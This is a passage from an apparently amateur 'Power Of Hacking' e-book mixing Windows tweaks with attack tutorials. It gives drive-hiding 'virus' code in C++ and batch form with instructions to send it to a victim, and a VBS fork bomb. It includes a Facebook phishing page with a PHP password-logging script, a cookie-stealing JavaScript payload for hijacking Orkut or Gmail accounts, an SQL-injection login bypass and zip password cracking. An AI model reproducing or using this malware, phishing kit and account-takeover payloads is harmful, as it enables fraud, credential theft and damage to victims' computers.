Power Of Hacking cd %systemroot%\System32 dir cls start /w wscript.exe C:\sleep3000.vbs echo Deleting Critical System Files… echo del *.* start /w wscript.exe C:\sleep3000.vbs echo Deletion Successful! echo: echo: echo: echo Deleting Root Partition… start /w wscript.exe C:\sleep2000.vbs echo del %SYSTEMROOT% start /w wscript.exe C:\sleep4000.vbs echo Deletion Successful! start /w wscript.exe C:\sleep2000.vbs echo: echo: echo: echo Creating Directory h4x… cd C:\Documents and Settings\All Users\Start Menu\Programs\ mkdir h4x start /w wscript.exe C:\sleep3000.vbs echo Directory Creation Successful! echo: Mail:mtahirzahid@yahoo.com
Page 72
Power Of Hacking echo: echo: echo Execution Attempt 1… start /w wscript.exe C:\sleep3000.vbs echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\ echo start hax.exe start /w wscript.exe C:\sleep3000.vbs echo Virus Executed! echo: echo: echo: start /w wscript.exe C:\sleep2000.vbs echo Disabling Windows Firewall… start /w wscript.exe C:\sleep2000.vbs echo Killing all processes… start /w wscript.exe C:\sleep2000.vbs echo Allowing virus to boot from startup… start /w wscript.exe C:\sleep2000.vbs echo: echo: echo Virus has been executed successfully! start /w wscript.exe C:\sleep2000.vbs echo: echo Have fun! start /w wscript.exe C:\sleep2000.vbs pause Mail:mtahirzahid@yahoo.com
Page 73
Power Of Hacking shutdown -f -s -c “Your computer has committed suicide. Have a nice day.” Saveas tahir.vbs Slowmessageappearhack:WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "notepad" WScript.Sleep 100 WshShell.AppActivate "Notepad" WScript.Sleep 500 WshShell.SendKeys "Tahir" WScript.Sleep 500 WshShell.SendKeys "Zahid " WScript.Sleep 500 WshShell.SendKeys ", Sana" WScript.Sleep 500 WshShell.SendKeys "Ullah" WScript.Sleep 500 WshShell.SendKeys "re " WScript.Sleep 500 WshShell.SendKeys "you" WScript.Sleep 500 WshShell.SendKeys "? " WScript.Sleep 500 WshShell.SendKeys "I a" WScript.Sleep 500 Mail:mtahirzahid@yahoo.com
Page 74
Power Of Hacking WshShell.SendKeys "m g" WScript.Sleep 500 WshShell.SendKeys "ood" WScript.Sleep 500 WshShell.SendKeys " th" WScript.Sleep 500 WshShell.SendKeys "ank" WScript.Sleep 500 WshShell.SendKeys "s! " Saveas tahir.vbs Text-To-Audio:Dim msg, sapi msg=InputBox("Enter your text for conversionâ&#x20AC;&#x201C;mtahirzahid.blogspot.com","TechVorm Text-To-Audio Converter") Set sapi=CreateObject("sapi.spvoice") sapi.Speak msg saveas tahir.vbs virusdownload:-
Wscript.Sleep 100 On Error Resume Next StrAgentName2 = "MERLIN" StrAgentPath2 = "C:\Windows\Msagent\Chars\" & strAgentName2 & ".Acs" Set objAgent2 = CreateObject("Agent.Control.2") ObjAgent2.Connected = TRUE ObjAgent2.Characters.Load strAgentName2, strAgentPath2
Mail:mtahirzahid@yahoo.com
Page 75
Power Of Hacking Set objPeter = objAgent2.Characters.Character(strAgentName2) ObjPeter.MoveTo 700,300 ObjPeter.Show ObjPeter.Play "GetAttention" ObjPeter.Play "GetAttentionReturn" ObjPeter.Speak("downloading virus . . . 20% . . . 40% . . . 60% . . . 80% . . . 100% virus downloaded") Wscript.Sleep 1000 Set objAction= objPeter.Hide Do While objPeter.Visible = True Wscript.Sleep 250 Loop Saveas tahir.vbs virusvbspleasesaveastahir.vbs:option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject ("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe" Mail:mtahirzahid@yahoo.com
Page 76
Power Of Hacking
Next
4 Ways to Hide Hard Drive on your PC This trick can be used for mere entertainment, when you prepare nice computer prank on your friends or colleagues, but it also might be quite useful from practical security purposes, especially, when you share your computer with other people. The question we address is ―How to Hide Hard Drive on your Computer?‖ We will provide several options on how to do so to satisfy need of all readers of this blog: 1. With HDHide freeware Hide Drives Hide (HDHide) can be use to hide or unhide drive letters A: - Z: on any computer using Windows 95/98/ME/NT/2000/XP operating systems - whether they are actual physical drives on a local machine or logical drives (partitions, server volumes, mapped drives, etc.). Any of these drives can be hidden or unhidden. The hidden drive letters will not be visible in Explorer or any other application that use the common Windows ‘Save‘, ‘Save As‘, or ‘Open‘ dialog boxes. The software is small, easy to use, and completely portable (does not need to be installed on your PC), so if you want a simple and straightforward solution, this method will fit your needs perfectly. Direct downloading Link. http://www.ziddu.com/download/2741816/hdhide.zip.html Screen:
2. With TweakUI freeware TweakUI is a part of the Microsoft PowerToys utilities, and can do much more than just hiding hard drives. It gives you access to system settings that are not exposed in the Windows XP default user interface, including mouse settings, Explorer settings, taskbar settings, and more. After installing, go to Start > Programs > PowerToys for Windows XP > TweakUI. Expand ‘My Computer‘, click on ‘Drives‘, then uncheck the drives you wish to hide. Direct downloading link. http://www.ziddu.com/download/2741877/TweakUiPowertoySetup.exe.html
3. With built-in Diskpart utility This way does not require from you installing or using any additional software to do the job, since Mail:mtahirzahid@yahoo.com
Page 77
Power Of Hacking you can achieve the same result easily using nothing more than the Command Prompt. Here‘s how: - Click Start -> Run (This brings up the Run dialog box) - Type cmd and press Enter (This brings up the Windows Command Prompt) - Type diskpart in the command prompt and press Enter (This launches the Diskpart utility within the Command Prompt window) - Now type list volume (This displays a list of all mounted volumes on your computer and their associated drive letters):
- Using the above picture as reference, if, for example, you would like to hide drive E, type select volume 6 - Now type remove letter E (Note: This action requires a computer reboot). Diskpart will now remove the drive letter. The drive will no longer be available via Windows Explorer or My Computer. Now, should you want to unhide the drive and make it accessible again, just repeat the above process. But instead of typing remove letter E, type assign letter E 4. By registry modification. - Open Registry Go to Run command, type "regedit" (without quotes) and press enter. - Registry page will open, now go to HKEY_CURRENT_USER‘Software‘Microsoft‘Windows‘CurrentVersion‘Policies‘Explorer - Now right click in right side pane and create DWORD Value. Call the new registry value as "NoDrives". Double click on "NoDrives" to enter a Decimal value. This value depends on the drives you wish to hide, and is created by adding the numbers for each drive you wish to hide from the list below. Click OK once you have entered this number. For example, to hide drive D you would enter a decimal value of 8. To hide both drives D and E, you would enter a decimal value of 24 (8+16). Values for each drive per its letter: A=1 B=2 C=4 D=8 E = 16 F = 32 G = 64 H = 128 I = 256 J = 512 K = 1024 Mail:mtahirzahid@yahoo.com
Page 78
Power Of Hacking L = 2048 M = 4096 N = 8192 O = 16384 P = 32768 Q = 65536 R = 131072 S = 262144 T = 524288 U = 1048576 V = 2097152 W = 4194304 X = 8388608 Y =16777216 Z = 33554432 All drives = 67108863 Once you restart your computer, the selected drives should be hidden. If you wish to remove the hidden drives, browse to the NoDrives registry value and delete it. C++ virus disable all drives:-
C++ Virus Code : #include < windows.h > #include < fstream.h > #include < iostream.h > #include < string.h > #include < conio.h > int main() { ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/ write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; } Copy the above code and paste in notepad Save the file with .cpp extension Compile and create .exe file in cpp Note: Don't run this c++ program ,it will attack your system itself. Copy the created .exe file and send it to your victim. You can also attach it with any other Mail:mtahirzahid@yahoo.com
Page 79
Power Of Hacking exe files.
Batch Virus Code Creation: REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n shutdown -r -c \"Sorry Your System is hacked by us!\" -f I think this code will simple for non c++ programmers. It is easy to create the batch file also. Copy the above code to notepad. Save it with .bat extension (for ex: nodrivevirus.bat) Send the file to your victim Changing Start button text in Windows XP ;(Estimated Time: 5-15 minutes approx, Level= Advanced User) I always wanted to change the text of my Start Button ever since I have been using the Windows operating System. It has always been the most difficult of tasks to accomplish with very risky and lengthy activities involving alteration of Windows registry. In fact I could never find of any way to change the Start button text without actually altering the registry values. (If you know of one please let me know so that it can be posted here for others to know, also please let me know if there is a software that does it automatically) Well the simplest and the least time consuming way of changing the Start button text is described below: Step 1: Create a system restore point just incase if something goes wrong you can roll back to the original settings. Make a back up copy of explorer.exe in a safe place, maybe in a different folder. Step 2: You would need to download a small freeware utility called Resource Hacker. "Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems." excerpt from Resource Hacker's Website Click here to download Resource Hacker Mail:mtahirzahid@yahoo.com
Page 80
Power Of Hacking Click here to visit the Resource Hacker's web page Step 3: Open Resource Hacker utility. Click on File ---> Open. Type "explorer.exe" in the text box. Step 4: Expand String Table ---> 37 from the tree view and click on 1033 as shown in the figure below Step 5: From the right window next to where start is written in front of 578 edit the text to what you want on your start button. Step 6: Click on the "Compile Script" button on top of the right window. Now click on File ---> Save as ----> wintipz.exe Step 7: Open registry editor by clicking on Start ---> Run and typing "regedit" at the text box. Navigate to HKEY_Local_Machine -> Software -> Microsoft -> Windows NT -> CurrentVersion -> Winlogon From the right pane double click on shell and replace "explorer.exe" with "wintipz.exe" as shown in figure below and then exit registry editor: Step 8: Restart your computer to see the changes. Changing title of windows media player You can change the title bar for the Windows Media Player 1. Start Regedit 2. Go to HKEY_USERS .DEFAULT Software Policies Microsoft WindowsMediaPlayer 3. Create a string value of TitleBar 4. Give it a value of whatever you want to appear in the title bar cracking password protected zip files What is FZC? FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means youâ&#x20AC;&#x2DC;re gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as google.com. Mail:mtahirzahid@yahoo.com
Page 81
Power Of Hacking FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a ―wordlist‖, which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com.). FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you‘re not supposed to have. So like every tool, this one can be used for good and for evil. The first thing I want to say is that reading this tutorial… is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase ―check name.txt‖ often in this text. These files should be in FZC‘s directory. They contain more information about FZC. FZC is a good password recovery tool, because it‘s very fast and also support resuming so you don‘t have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or undercase letter or a symbol such as ! or &) because 32 chars is the maximum value that FZC will accept, but it doesn‘t really matter, because in order to bruteforce a password with 32 chars you‘ll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information. FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don‘t require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password. Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait… and wait… and wait…and have good thoughts like ―In wordlist mode I‘m gonna get the password in minutes‖ or something like this… you start doing all this and remember ―Hey this guy started with all this bullshit and didn‘t say how I can start a wordlist attack!…‖ So please wait just a little more, read this tutorial ‘till the end and you can do all this ―bullshit‖. We need to keep in mind that are some people might choose some really weird passwords (for example: ‗e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won‘t help you anymore. Instead, you‘ll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won‘t get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB‘s list and start using the Brute Force attack. If you have some sort of a really fast and new computer and you‘re afraid that you won‘t be able to use your computer‘s power to the fullest because the zip cracker doesn‘t support this kind of technology, it‘s your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method. Mail:mtahirzahid@yahoo.com
Page 82
Power Of Hacking Now that we‘ve gone through all the theoretical stuff, let‘s get to the actual commands. Bruteforce The command line you‘ll need to use for using brute force is: fzc -mb -nzFile.zip -lChr Lenght -cType of chars Now if you read the bforce.txt that comes with fzc you‘ll find the description of how works Chr Lenght and the Type of chars, but hey, I‘m gonna explain this too. Why not, right?… (but remember look at the bforce.txt too) For Chr Lenght you can use 4 kind of switches… -> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords -> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars -> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don‘t think that you would do this…. if you are thinking in doing this get a live… -> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option… For the Type of chars we have 5 switches they are: -> a for using lowercase letters -> A for using uppercase letters -> ! for using simbols (check the Bforce.txt if you want to see what simbols) -> s for using space -> 1 for using numbers Example: If you want to find a password with lowercase and numbers by brute force you would just do something like: fzc -mb -nzTest.zip -l4-7 -ca1 This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase. ***** hint ***** You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn‘t work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers. Wordlist Mail:mtahirzahid@yahoo.com
Page 83
Power Of Hacking Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I‘m not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I‘m going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too. To start a wordlist attak you‘ll do something like. fzc -mwMode number -nzFile.zip -nwWordlist Where: Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode. File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn‘t in the same directory of FZC you‘ll need to give the all path. You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode. So if you something like fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+ FZC would just start reading at line 50 and would just read with length >= to 9. Example: If you want to crack a file called myfile.zip using the ―theargonlistserver1.txt‖ wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do: fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50 Resuming Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too). To resume the bruteforce attack you just need to do: fzc -mr And the bruteforce attack will start from the place where it stopped when you pressed the ESC key. But if you want to resume a wordlist attack you‘ll need to start a new wordlist attack, saying where it‘s gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you‘ll type fzc -mw3 -nzfile.zip -nwwordlist.txt -f100 Mail:mtahirzahid@yahoo.com
Page 84
Power Of Hacking Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session. Well, it looks like I covered most of what you need to know. I certainly hope it helped you… don‘t forget to read the files that come with the program delete an undeletable file Hello Friends, this Tutorial is for all those who want to delete some files but they cannot delete them due to some reasons. Well this is a Full Proof way of deleting any Damn File. After Deleting the File in this way there won‘t be any trace of that File on your computer. Beware : Make sure that the file you are Deleting is not a System File. Open a Command Prompt window and leave it open. Close all open programs. Click Start, Run and enter TASKMGR.EXE Go to the Processes tab and End Process on Explorer.exe. Leave Task Manager open. Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in. At the command prompt type DEL where is the file you wish to delete. Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell. Close Task Manager. Or you can try this Open Notepad.exe Click File>Save As..> Locate the folder where your undeletable file is Choose ‗All files‘ from the file type box Click once on the file u wanna delete so its name appears in the ‗filename‘ box Put a ‖ at the start and end of the filename (the filename should have the extension of the undeletable file so it will overwrite it) Click save, It should ask u to overwrite the existing file, choose yes and u can delete it as normal Here‘s a manual way of doing it. I‘ll take this off once you put into your first post zain. Start Run Type: command To move into a directory type: cd c:\*** (The stars stand for your folder) If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1 Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc… And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad Mail:mtahirzahid@yahoo.com
Page 85
Power Of Hacking file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension. email tracker Here we will take the case of Google mail and Yahoo mail to find out the full header. Google Mail. Using your id/password, login to Gmail. Open the mail for which you wish to find the full header of the sender. Click on the inverted triangle placed just next to Reply->then show original You will get something like thisâ&#x20AC;Ś Delivered-To: MrRakesh@gmail.com Received: by 10.36.81.3 with SMTP id e3cs239nzb; Tue, 12 September 2007 15:11:47 -0800 (PST) Return-Path: Received: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb.2007.03.12.15.11.46; Tue, 12 September 2007 15:11:47 -0800 (PST) Message-ID: <20070312231145.62086.mail@mail.emailprovider.com> Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 September 2007 15:11:45 PST Date: Tue, 12 September 2007 15:11:45 -0800 (PST) From: Mr Jones Subject: Hello To: Mr Rakesh In the example, headers are added to the message three times: 1. When Mr. Jones composes the email Date: Tue, 12 September 2007 15:11:45 -0800 (PST) From: Mr Jones Subject: Hello To: Mr Rakesh Mail:mtahirzahid@yahoo.com
Page 86
Power Of Hacking 2. When the email is sent through the servers of Mr. Jones' email provider, mail.emailprovider.com Message-ID: <20070312231145.62086.mail@mail.emailprovider.com> Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 September 2007 15:11:45 PST 3.When the message transfers from Mr. Jones' email provider to Mr. Rakesh's Gmail account Delivered-To: MrRakesh@gmail.com Received: by 10.36.81.3 with SMTP id e3cs239nzb;Tue, 12 September 2007 15:11:47 -0800 (PST) Return-Path: MrJones@emailprovider.com Received: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb; Tue, 12 September 2007 15:11:47 -0800 (PST) Below is a description of each section of the email header: Delivered-To: MrRakesh@gmail.com The email address the message will be delivered to. Received: by 10.36.81.3 with SMTP id e3cs239nzb; Tue, 29 Mar 2005 15:11:47 -0800 (PST) The time the message reached Gmail's servers. Return-Path: The address from which the message was sent. Received: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb.2005.03.29.15.11.46; Tue, 29 Mar 2005 15:11:47 -0800 (PST) The message was received from mail.emailprovider.com, by a Gmail server on March 29, 2005 at approximately 3 pm. Message-ID: 20050329231145.62086.mail@mail.emailprovider.com A unique number assigned by mail.emailprovider.com to identify the message. Mail:mtahirzahid@yahoo.com
Page 87
Power Of Hacking Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 29 Mar 2005 15:11:45 PST Mr. Jones used an email composition program to write the message, and it was then received by the email servers of mail.emailprovider.com. Date: Tue, 29 Mar 2005 15:11:45 -0800 (PST) From: Mr Jones Subject: Hello To: Mr Rakesh The date, sender, subject, and destination -- Mr. Jones entered this information (except for the date) when he composed the email. And for IP, look for Received:from followed by the IP within square brackets [ ] e.g. Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 Also importantly, there are times when you might find multiple Received: from entries, in that case, please select the last one as the valid choice. Error in notepad:error in notepad Do the following : 1. Open Notepad 2. Type : bush hid the facts 3. Save it ! 4. Open it again ! Wow ! You got an error ! Reason : The sentence you type is a 4-3-3-5 combination, which is not valid in UNICODE which is used to make notepad Phishing WebPage: Creating webpage which look like any site is described as Phishing. By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password. Step 1: Go to Facebook.com Right click on the white space of the front page. Select "View Page source". Mail:mtahirzahid@yahoo.com
Page 88
Power Of Hacking Copy the code to Notepad.
Step2: Now find (Press ctrl +f) for "action=" in that code. You fill find the code like this:
The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html
Step 3: Now we need to create the "next.php" to store the password. so open the notepad and type the following code: <php header("Location: http://www.Facebook.com/login.php "); $handle = fopen("pswrds.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> save this file as "next.php" Step 4: open the notepad and just save the file as "pswrds.txt" without any contents. Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site. Note: that web hosting service must has php feature. Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. Mail:mtahirzahid@yahoo.com
Page 89
Power Of Hacking use this sites through the secure connection sites(so that you can hide your ip address) like: http://flyproxy.com . find best secure connection site.
Step 5: create an mail account with facebook keyword like : FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_f riends@gmail.com Step 6 : Copy the original Facebook friendship invitation and paste in your mail. remove the hyperlink from this http:/www.facebook.com/n/?reqs.php Mark it and push the Add hyperlink button *Updated* everyone asking doubts about this 6th step. You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail. In that content , you can find this link http:/www.facebook.com/n/?reqs.php . Just change the delete the link and create link with same text but link to your site.
Mail:mtahirzahid@yahoo.com
Page 90
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 91
Power Of Hacking Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php but lead to your phisher page..
Note: For user to believe change Your phishing web page url with any of free short url sites. Like : co.nr, co.cc,cz.cc This will make users to believe that it is correct url. Don't use this method for hacking others account. This article is for educational purpose only. Finding IP address in Hotmail 1. Log into your Hotmail account with your username and password. 2. Click on the Mail tab on the top. 3. Open the mail. 4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers, * Click on Options on the top-right corner * In the Mail Options page, click on Mail Display Settings * In Message Headers, make sure Advanced option is checked * Click on Ok button * Go back to the mails and open that mail 5. You should see the email headers now. 6. You may copy the headers and use a IP address detection script to ease the process. Or if you want to manually find the IP address, proceed to 7. 7. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address # In this case the IP address of the sender is [68.34.60.59]. # If you find a header with Received: from followed by a Gmail proxy like thi # Look for Received: from followed by IP address within square brackets[]. In this case, the IP address of the sender is [69.140.7.58]. # Or else if you have headers like this 9. Look for Received: from followed by IP address within square brackets[]. In this case, the IP address of the sender is [61.83.145.129] (Spam mail). 10. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com. 11. Track the IP address of the sender Finding IP address in Yahoo! Mail
Mail:mtahirzahid@yahoo.com
Page 92
Power Of Hacking 1. Log into your Yahoo! mail with your username and password. 2. Click on Inbox or whichever folder you have stored your mail. 3. Open the mail. 4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers, * Click on Options on the top-right corner * In the Mail Options page, click on General Preferences * Scroll down to Messages where you have the Headers option * Make sure that Show all headers on incoming messages is selected * Click on the Save button * Go back to the mails and open that mail 5. You should see similar headers like this:
# You may copy the headers and use a IP address detection script to ease the process. Or if you want to manually find the IP address, proceed to 7. # Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109. That is be the IP address of the sender. If there are many instances of Received: from with the IP address, select the IP address in the last pattern. If there are no instances of Received: from with the IP address, select the first IP address in X-Originating-IP. # Track the IP address of the sender FM on ur google talk Hi Guy's 'n' Gal's this is trick presently iam using this for listening FM
FM is on your GTalk now ( Teen Taal 110...,only hindi songs) For this u need to follow these steps..., 1) add this id in ur GTalk: service@gtalk2voip.com 2) than add: 110@radio.gtalk2voip.com After completion of these 2 steps Then make a cal to 110@radio.gtalk2voip.com than u wil be directly connected to teen taal FM radio station Folder Options missing Many of us sometimes find the folder options missing in windows explorer. Here's the solution Open Run and then type "gpedit.msc". Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer. Mail:mtahirzahid@yahoo.com
Page 93
Power Of Hacking Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu" Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.
I hopes that you will find the option after restarting windows. free webpages .tk .coo.ir .synthasite.com .page.tl --------------free servers.com------------9f.com 7p.com "4t.com 8m.com 8m.net 8k.com s5.com itgo.com iwarp.com 4mg.com gq.nu faithweb.com tvheaven.com freehosting.net htmlplanet.com scriptmania.com hack cookie based Hacking orkut or Gmail" With the Help of Cookies or by "stealing cookies of the victim By going through this post i hope you will understand how easy has hacking become with the help of cookies. By this post you'll be learning cookie stealing and Hacking orkut Or Gmail account. Procedure to hack gmail or orkut through mozilla by stealing cookies:1.Firstly you need have Mozilla firefox 2.Download cookie editor plugin for Mozilla firefox 3.You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account Mail:mtahirzahid@yahoo.com
Page 94
Power Of Hacking for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts
Cookie Script: javascript:nobody=replyForm;nobody.toUserId.value=xxxxxxx; nobody.scrapText.value=document·cookie;nobody.action='scrapbook.aspx? Action.submit';nobody.submit()
How to use cookies script? 1. Replace your number "UserId.value=xxxxxxxx" How to Replace your Number 1. Go to your album 2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value. 3. Now replace your value with the value in the java script Your script will look like javascript:nobody=replyForm;nobody.toUserId.value=yournumber; nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,1 11,107,105,101)); nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit() 2.Now send this Cookie script to the victim and ask him to paste in Adress bar and Press enter 3.You'll Get his cookie in your scrap book 4.After Getting a cookie go to your orkut Home page , Then clik on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor) 5.click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Script put ur eight digit number in the place of (33444211) Thats it your done With. Logout of your orkut and login again and you'll be in your victims Homepage. HACK to overcome Rapidshare download limit 1. 1st method which i think all us we use is simple dissconecting n' conecting method but it consumes a lot of time i think..... 2. This method involves few simple DOS commands 1. Click Start 2. Click run 3. In the run box type cmd and click OK 4. When the command prompt opens type the following. ENTER after each new line. Mail:mtahirzahid@yahoo.com
Page 95
Power Of Hacking ipconfig /flushdns ipconfig /release ipconfig /renew exit 5. Erase your cookies in whatever browser you are using. 6. Try the rapidshare download again. Hack Websites NOTE: Works Only On Certian sites If you have the html and javascript knowledge then you can access password protected websites. So you want to know how?? keep reading….. 1. Open the website you want to hack. Provide wrong username-password in its log in form. (e.g : Username : me and Password: ‗ or 1=1 –) An error will occur saying wrong username-password. Now be prepared Your experiment starts from here… 2. Right click anywhere on that error page =>> go to view source. 3. There you can see the html codings with javascripts. 4. There you find somewhat like this…. 5. Before this login information copy the url of the site in which you are. (e.g :‖‖) 6. Then delete the javascript from the above that validates your information in the server.(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information) 7. Then take a close look for ―‖[without quotes] -> replace ― ‖ there instead of ―‖. See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write ) 8. Just go to file => save as and save it any where in your hardisk with ext.html(e.g: c:chan.html) 9. Reopen your target web page by double clicking ‗chan.html‘ file that you saved in your harddisk earlier. 10. U see that some changes in current page as compared to original One. Don‘t get worried. 11. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --] Congrats!!!!!! You have successfully cracked the above website and entered into the account of Ist user saved in the server‘s database. *****[Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes] The above trick won‘t work on the websites using latest technique to protect there servers. Still you may find some websites to use this trick. Enjoy!!!! WARNING: We post this trick just for your educational knowledge only. Don‘t misuse it other wise you will be in trouble. I take no responsibility of usage of the above trick] Hack yahoo:I know a lot of you are wondering how to hack Yahoo..Well an exploit founded from the hacker group [POC] has discovered the exploit. Me, being a close friend of the leader, I have posted what he has sent me: Hey, I found this way to hack Yahoo, it's actually pretty easy, here is what you do: Mail:mtahirzahid@yahoo.com
Page 96
